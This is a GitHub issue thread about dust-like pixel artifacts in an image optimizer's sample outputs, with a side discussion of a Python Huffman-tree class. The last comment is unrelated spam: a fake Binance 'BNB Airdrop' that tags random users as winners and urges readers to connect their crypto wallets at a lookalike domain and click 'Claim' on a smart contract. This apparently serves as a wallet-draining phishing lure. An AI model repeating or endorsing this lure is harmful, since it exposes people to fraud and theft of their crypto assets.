### ISSUE TITLE
Visual artifacts on the sample optimized images

### ISSUE THREAD

**Issue by victordomingos** [prashant-kikani/image-optimizer#1]
I noticed that two of the sample optimized images shown in the Readme file have noticeable visual artifacts, that in my opinion shouldn't be present. Please take a look at this screenshot of a detail from `p1_opti_by_pkikani.jpeg`:

![captura de ecra 2018-10-09 as 10 53 21](https://user-images.githubusercontent.com/18650184/46661818-cc2dbe80-cbb1-11e8-88e2-117aab7f7223.png)

And this one from `m2_opti_by_pkikani.jpg`:
![captura de ecra 2018-10-09 as 10 55 55](https://user-images.githubusercontent.com/18650184/46661895-f1223180-cbb1-11e8-851b-e91b273d0e8e.png)

Notice that dust-like scattered pixels? I am not sure what is causing them, but unless the optimized images are meant to be used in very low resolution, it may be a problem.

**Comment by prashant-kikani** [comment]
Yes. I also have noticed that. I don't know why that's happening.. Its not like it appears in every image.
I tried to optimize these images in a online optimizer. There its working fine with no change in resolution & size decreased.

They are occuring in full dark / full white parts. May be median smoothing can be done to lower the effect of this noice. As median noice is an effective way to remove S&P noice.

**Comment by tuanhm11299** [comment]
I have a question, why when I return self like in the code:
`def init_leaf(self, value, freq):
            return self(value, freq, None, None)
        
        def init_node(self,left_child,right_child):
            freq = left_child.freq + right_child.freq
            return self(None,freq,left_child,right_child)` 
The problem says:
self is not callable
Is it will cause error or nothing ? This is the first time i use Python so i dunno is it make error or not.

**Comment by victordomingos** [comment]
@tuanhm11299 in the last line you are returning the result of the call to a callable under the name `self`. Maybe it does not make sense. 

Let’s see. In object oriented Python, it’s a common practice to use `self` in a method as a reference to the object itself (the class instance). From the code you posted, we are not able to tell what class does self refer to, and what arguments does its `__init__()` method expect. Can you please provide more details on your code and what you’re trying to to?

**Comment by tuanhm11299** [comment]
![image](https://user-images.githubusercontent.com/48412798/57977141-1a465280-7a1c-11e9-83bd-62ef85b9c797.png)
well I'm making node of huffman tree and I want to init leaf and node, so can be another way to return self ?

**Comment by victordomingos** [comment]
Not sure if I am understanding correctly.but if you intend to return the object corresponding to the current class instance, you may just use `return self`.

**Comment by tuanhm11299** [comment]
Oh i see, maybe new versions of Python have no return like my code :D

**Comment by victordomingos** [comment]
I am not sure that defining a a class inside another class is very “pythonic”. What I would expect is something like defining a new class that inherits from the previous one. 

Concerning the return statement, you may do something like `return __Node(.....)`, which will allow you to generate a new instance of that class on return. Is that what you meant?

**Comment by tuanhm11299** [comment]
Yeah that's what I meant, sir. :D

**Comment by vim1996** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @MitchellTesla, @zhanghaixin246, @semrekkers, @mohamedmansour, @mikeyrf, @reap3rGrim, @HectorZarate
